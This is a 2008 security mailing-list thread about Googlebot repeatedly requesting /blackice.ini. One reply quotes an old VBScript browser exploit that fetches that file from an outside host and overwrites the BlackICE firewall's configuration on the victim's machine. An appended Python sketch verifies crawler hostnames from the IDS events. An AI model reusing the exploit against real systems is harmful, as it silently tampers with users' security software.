[Dailydave] Google Robot and Black ICE

Kevin Finisterre (lists) kf_lists at digitalmunition.com
Thu Feb 21 00:34:55 EST 2008


My friend, have you forgotten our old Black Ice exploit? God... I had
to search my spool for the lulz as they say.

<script language="vbscript">
const adTypeBinary = 1
const adSaveCreateOverwrite = 2
const adModeReadWrite = 3
set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
xmlHTTP.open "GET","http://www.snosoft.com/blackice.ini",false
xmlHTTP.send
contents = xmlHTTP.responseBody
Set oStr = CreateObject("ADODB.Stream")
oStr.Mode = adModeReadWrite
oStr.Type = adTypeBinary
oStr.Open
oStr.Write(contents)
oStr.SaveToFile "F:\Program Files\Network ICE\BlackICE\blackice.ini", adSaveCreateOverwrite
</script>

maybe this will refresh your memory:

"I would like to see a panel discussion about the disclosure of lame
bugs; I am probably going to submit a white paper on it to an upcoming
conference.

We do not get too concerned about local Windows BO, unless they are in
IE, Outlook, etc. that would allow for a network vector for compromise.
On a system that is more commonly deployed as a multi-user system
(Unix, Linux), of course we consider a local priv escalation serious and
provide protection in our host-based products.

We have about 15,000 corporate customers, including most of the Fortune
1000, and in my six years at ISS not a single one has asked me for our
products to detect or stop a local Windows BO (besides IE or Outlook). I
am responsible for every signature in all our products."

can you name that quote? heh
-KF


On Feb 20, 2008, at 8:03 PM, Adriel Desautels wrote:

> Greetings,
> 	I was just looking over some IDS events and noticed that Google  
> keeps looking for blackice.ini on one of our web servers. Does  
> anyone have any idea as to why Google would be doing this? This  
> happens on average 3-5 times a day. Nothing critical, just curious.  
> Every time Google tries, the request is denied.
>
> Event:
> ------
> Blocked access to : /blackice.ini
> Reason		  : URL file extension is restricted by policy
> SOURCE IP	  : crawl-66-249-73-113.googlebot.com
> Detected On	  : Web Server Logs, NIDS, Firewall Logs
>
>
>
>
> -- 
>
> Regards,
> 	Adriel T. Desautels
> 	Chief Technology Officer
> 	Netragard, LLC.
> 	Office : 617-934-0269
> 	Mobile : 617-633-3821
> 	http://www.linkedin.com/pub/1/118/a45
>
> 	Join the Netragard, LLC. Linked In Group:
> 	http://www.linkedin.com/e/gis/48683/0B98E1705142
>
> ---------------------------------------------------------------
> Netragard, LLC - http://www.netragard.com  -  "We make IT Safe"
> Penetration Testing, Vulnerability Assessments, Website Security
> _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave
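
Added example (not part of the original thread or either poster's code): a Python sketch that parses events in the format quoted above and forward-confirms that a source name such as crawl-66-249-73-113.googlebot.com really resolves back to the address it names, so repeated crawler hits on /blackice.ini can be told apart from look-alike hostnames. The function names, verdict labels, the second sample event and the assumption that the crawl-a-b-c-d label encodes the client IP are introduced here.

```python
import re
import socket

# Suffixes Google documents for its crawler hostnames.
CRAWLER_SUFFIXES = (".googlebot.com", ".google.com")
FIELD = re.compile(r"^[>\s]*(Blocked access to|Reason|SOURCE IP|Detected On)\s*:\s*(.+?)\s*$")
EMBEDDED_IP = re.compile(r"^crawl-(\d{1,3})-(\d{1,3})-(\d{1,3})-(\d{1,3})\.")

# First event is the one quoted in the thread; the second is constructed (look-alike name).
SAMPLE_EVENTS = """\
Blocked access to : /blackice.ini
Reason            : URL file extension is restricted by policy
SOURCE IP         : crawl-66-249-73-113.googlebot.com
Detected On       : Web Server Logs, NIDS, Firewall Logs

Blocked access to : /blackice.ini
SOURCE IP         : crawl-66-249-73-113.googlebot.com.example.net
"""

def parse_events(text):
    """Split the report on blank lines and return one dict of fields per event."""
    blocks = re.split(r"\n\s*\n", text.strip())
    events = [dict(m.groups() for m in map(FIELD.match, b.splitlines()) if m) for b in blocks]
    return [e for e in events if e]

def dns_forward(hostname):
    """Default resolver: the IPv4 addresses the name resolves to (needs live DNS)."""
    try:
        return set(socket.gethostbyname_ex(hostname)[2])
    except OSError:
        return set()

def classify_source(hostname, forward=dns_forward):
    """Forward-confirm a crawler hostname that came from a reverse lookup."""
    host = hostname.lower().rstrip(".")
    if not host.endswith(CRAWLER_SUFFIXES):
        return "not-google"
    m = EMBEDDED_IP.match(host)
    if not m:
        return "unconfirmed"  # no client IP recoverable from the name alone
    client_ip = ".".join(m.groups())  # assumption: octets in the name are the client IP
    return "verified-crawler" if client_ip in forward(host) else "unconfirmed"

def triage(text, forward=dns_forward):
    """Return (path, source, verdict) for every parsed event."""
    return [(e.get("Blocked access to", "?"), e.get("SOURCE IP", ""),
             classify_source(e.get("SOURCE IP", ""), forward)) for e in parse_events(text)]
```

Called without a forward argument, classify_source performs a live DNS lookup; pass a stub resolver to run it offline.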